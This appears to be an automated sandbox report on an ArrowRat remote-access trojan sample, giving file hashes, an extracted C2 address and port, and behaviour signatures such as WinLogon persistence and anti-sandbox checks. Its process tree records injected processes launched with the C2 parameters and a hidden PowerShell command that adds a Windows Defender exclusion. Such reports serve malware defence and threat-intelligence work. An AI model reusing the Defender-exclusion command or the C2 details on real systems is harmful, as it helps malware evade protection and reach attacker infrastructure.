Overview

overview

10

Static

static

10

arrow/0caa...bd.exe

windows7-x64

10

arrow/0caa...bd.exe

windows10-2004-x64

10

arrow/150c...0a.exe

windows7-x64

10

arrow/150c...0a.exe

windows10-2004-x64

10

arrow/17a7...ff.exe

windows7-x64

10

arrow/17a7...ff.exe

windows10-2004-x64

10

arrow/2380...0c.exe

windows7-x64

10

arrow/2380...0c.exe

windows10-2004-x64

10

arrow/2fb8...ee.exe

windows7-x64

3

arrow/2fb8...ee.exe

windows10-2004-x64

7

arrow/3dbd...fb.exe

windows7-x64

10

arrow/3dbd...fb.exe

windows10-2004-x64

10

arrow/4a09...07.exe

windows7-x64

10

arrow/4a09...07.exe

windows10-2004-x64

10

arrow/4c4d...a5.exe

windows7-x64

3

arrow/4c4d...a5.exe

windows10-2004-x64

7

arrow/54a0...24.exe

windows7-x64

10

arrow/54a0...24.exe

windows10-2004-x64

10

arrow/59a7...8c.exe

windows7-x64

10

arrow/59a7...8c.exe

windows10-2004-x64

10

arrow/5a45...7c.exe

windows7-x64

10

arrow/5a45...7c.exe

windows10-2004-x64

10

arrow/5d57...92.exe

windows7-x64

10

arrow/5d57...92.exe

windows10-2004-x64

10

arrow/6540...5e.exe

windows7-x64

10

arrow/6540...5e.exe

windows10-2004-x64

10

arrow/8a3d...bc.exe

windows7-x64

10

arrow/8a3d...bc.exe

windows10-2004-x64

10

arrow/a192...71.exe

windows7-x64

10

arrow/a192...71.exe

windows10-2004-x64

7

arrow/b20d...3f.exe

windows7-x64

10

arrow/b20d...3f.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    138s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-05-2023 12:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    arrow/3dbd1065734c9b3e603bc2a81dbadb77beeb54c6a918a6a4ae0687659ac3c0fb.exe

  • Size

    138KB

  • MD5

    7da02064216481c00e88ca35db73c247

  • SHA1

    99983e91bc7511fcb650c31c26a33b581e242913

  • SHA256

    3dbd1065734c9b3e603bc2a81dbadb77beeb54c6a918a6a4ae0687659ac3c0fb

  • SHA512

    df61e4e5226cf035592ec464b68452507df4178edac853329cda8e0fe06102f8eae65bd9d7a6b68d835e2d7ef4ed3748ccd8bc1ed918eb2a85fb9788e5aafae6

  • SSDEEP

    3072:LbvJ5mz7Bqh1v59Y08mAjs0Ltel+qOeJHlpV8b+Y/YK:Lbv3S7BqjjYHdrqkL/

Score
10/10
arrowrat9g7dxwpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

9G7DXW

C2

51.178.165.162:1338

Mutex

Q2909Q

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\arrow\3dbd1065734c9b3e603bc2a81dbadb77beeb54c6a918a6a4ae0687659ac3c0fb.exe
    "C:\Users\Admin\AppData\Local\Temp\arrow\3dbd1065734c9b3e603bc2a81dbadb77beeb54c6a918a6a4ae0687659ac3c0fb.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2800
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 9G7DXW 51.178.165.162 1338 Q2909Q
      2⤵
        PID:1084
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 9G7DXW 51.178.165.162 1338 Q2909Q
        2⤵
          PID:4928
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 9G7DXW 51.178.165.162 1338 Q2909Q
          2⤵
            PID:4180
          • C:\Windows\System32\ComputerDefaults.exe
            "C:\Windows\System32\ComputerDefaults.exe"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2220
            • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
              "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\TX98E1\4RUF2A.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2572
        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
          1⤵
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:3348
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:2244

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133277369508270428.txt
          Filesize

          75KB

          MD5

          e3417e64fd17fa01c90cf956829ca7ff

          SHA1

          f8960ede60ed71f3ca9f505556390518621393f6

          SHA256

          a55bc5d91308f7bb7cef9268f6333172653c4119c8641abcb0692116fecd860c

          SHA512

          3126805740cdea1d97c1887c0e0e33094b5e187d218f0b8b26c5305ed6aa1737d88a9434e3cfcec9bf1009c9a4fe53e441312e8c24171e08fad2eed0d08cf4a9

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u3wymvsu.uj3.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/2244-177-0x000001EB64DE0000-0x000001EB64E00000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2244-175-0x000001EB647D0000-0x000001EB647F0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2244-172-0x000001EB64A20000-0x000001EB64A40000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2572-159-0x000002249D360000-0x000002249D370000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2572-161-0x000002249D360000-0x000002249D370000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2572-158-0x000002249D2E0000-0x000002249D302000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2572-162-0x000002249D360000-0x000002249D370000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2572-160-0x000002249D360000-0x000002249D370000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2800-166-0x0000000002970000-0x0000000002971000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4180-140-0x00000000055C0000-0x00000000055D0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4180-143-0x0000000005BD0000-0x0000000005C36000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4180-146-0x0000000006480000-0x00000000064D0000-memory.dmp

          Filesize

          320KB

          Download

        • memory/4180-139-0x0000000005D80000-0x0000000006324000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/4180-137-0x0000000005450000-0x00000000054EC000-memory.dmp

          Filesize

          624KB

          Download

        • memory/4180-136-0x00000000053B0000-0x0000000005442000-memory.dmp

          Filesize

          584KB

          Download

        • memory/4180-134-0x0000000000400000-0x0000000000416000-memory.dmp

          Filesize

          88KB

          Download

        • memory/4180-311-0x00000000055C0000-0x00000000055D0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5076-133-0x00000199251C0000-0x00000199251E8000-memory.dmp

          Filesize

          160KB

          Download